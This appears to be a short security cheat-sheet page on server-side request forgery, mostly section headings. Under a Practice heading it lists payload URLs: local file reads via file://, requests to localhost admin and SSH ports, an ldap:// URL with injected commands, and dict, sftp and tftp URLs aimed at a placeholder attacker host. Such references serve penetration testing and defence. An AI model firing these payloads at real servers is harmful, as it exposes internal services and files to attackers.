SSRF (Server-Side Request Forgery)
Theory
Practice
file://PATH/TO/FILE
http://127.0.0.1:80/admin
http://127.0.0.1:80
http://127.0.0.1:22
ldap://127.0.0.1:389/%0astats%0aquit
dict://{attacker_url}:11111/
sftp://{attacker_url}:11111/
tftp://{attacker_url}:12346/TESTUDPPACKETBypassing filters
Blind SSRF vulnerabilities
SSRF via SNI data from certificate
SSRF with Command Injection
Resources
Last updated
Was this helpful?
